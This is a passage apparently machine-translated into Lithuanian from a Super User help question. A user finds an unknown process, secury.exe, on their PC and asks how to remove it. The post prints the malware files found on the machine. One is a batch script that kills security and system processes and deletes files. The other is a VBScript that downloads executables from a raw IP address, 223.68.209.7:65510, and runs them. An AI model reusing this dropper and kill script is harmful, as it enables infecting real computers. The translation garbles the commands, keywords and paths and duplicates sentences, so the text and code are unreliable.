langai - Kaip visam laikui nužudyti garo kliento įkroviklį - Super User

Mano užduočių tvarkyklėje turiu tokią situaciją:

Mano užduočių tvarkyklėje turiu tokią situaciją:

Aš nežinau, kokia programa tai yra, bet tikrai ne „Steam“ kliento „bootstrapper“, nes nenoriu ją įdiegti ir taip pat negaliu jo pašalinti.

Jei bandau išsiaiškinti, kokia programa yra per šį veiksmą:

Matau kažką panašaus:

MS Config programinėje įrangoje neradau nieko, kas atrodo kaip secury.exe.

Kai atidarau failo vietą, matau tris failus:

m.bat, b.exe, 4.vbs.

Toliau pateikiamas m.bat turinys:

užduočių rinkinys / f / t / im secury.exe c: programinės įrangos failų failas / f / t / im kingsoft.exe užduotis / f / t / im expl0rer.exe užduotis / f / t / im ieplare.exev taskkill / f / t / im nssm.exe užduočių rinkinys / f / t / im MSASCui.exe užduočių rinkinys / f / t / im SystemSettlngs.exe užduočių rinkinys / f / t / im SystemSetting.exe užduotis / f / t / im Process.exe užduočių rinkinys / f / t / im winlnlt.exe užduočių rinkinys / f / t / im WindowsUpgrade.exe užduotis / f / t msdc.exe užduočių rinkinys / f / t / im Fiddlere.exe užduočių rinkinys / f / t / im shovst.exe užduočių rinkinys / f / t / im lqrtqe.exe užduočių rinkinys / f / t / im apkls.exe užduočių rinkinys / f / t / im winlog.exe užduočių rinkinys / f / t / im svchosts.exe užduotis / f / t / im win1ogins.exe užduočių rinkinys / f / t / im shovsts.exe užduočių rinkinys / f / t / im fcty.exe užduočių rinkinys / f / t / im soiuos.exe užduotys / f / t / im TrustedInstaller.exe del C: C: „Windows“ programinė įranga „TrustedInstaller.exe del C“: „Programos duomenys “oftoft.exe del C:„ Programos duomenys “r0rer.exe„ del C “:„ Programos duomenys “iplare.exe del C:„ Programos duomenys “„ssm.exe del C“: Programos duomenys MSASCui.exe del C: Pro gramData SystemSettlngs.exe del C: Programos duomenys SystemSetting.exe del C: Programos duomenys.exe del C: Programos duomenys WinLNLT.exe del C: Programos duomenys WindowsUpgrade.exe del C: Programos duomenys msd.exe del C: Programos duomenys Fiddlere.exe del C: Programos duomenys shovst.exe del C: Programos duomenys qrtqe.exe del C: Programos duomenys apkls.exe del C: Programos duomenys loglog.exe del C: Programos duomenys svchosts.exe del C: Programos duomenys win1ogins.exe del C: Programos duomenys shovsts.exe del C: Programos duomenys wcty.exe del C: Programos duomenys.exe.exe C: Programos duomenys C: Programos Duomenų kopija3.exe

Toliau eina 4.vbs:

Nustatyti xPost = CreateObject ("Microsoft.XMLHTTP") xPost.Open "Open", "http://223.68.209.7:65510/2.exe", 0 xPost.Send () Set sGet = CreateObject ("ADODB.Stream" ) sGet.Mode = 3 sGet.Type = 1 sGet.Open () sGet.Write (xPost.responseBody) sGet.SaveToFile "c: Programos duomenys2.exe", 2 Nustatyti xPost = CreateObject ("Microsoft.XMLHTTP") xPost.Atidarykite „GET“, „http://223.68.209.7:65510/pool.exe“, 0 xPost.Send () Set sGet = CreateObject („ADODB.Stream“) sGet.Mode = 3 sGet.Type = 1 sGet.Open () sGet.Write (xPost.responseBody) sGet.SaveToFile "c: Programos duomenys2.exe", 2 CreateObject ("WScript.Shell") .Vykdykite "C: Programos duomenys pool3.exe" CreateObject ( "WScript.Shell"). Vykdyti "del C: Programos duomenų kopija3.exe"

Ką aš galiu padaryti, kad būtų sustabdytas secury.exe piktnaudžiavimas kompiuterio kompiuterio įgaliojimais?

PS Aš įvykdžiau „Avast“ pilną kompiuterio patikrinimą, bet jis nieko nerado.

Exe piktnaudžiavimas kompiuterio kompiuterio įgaliojimais?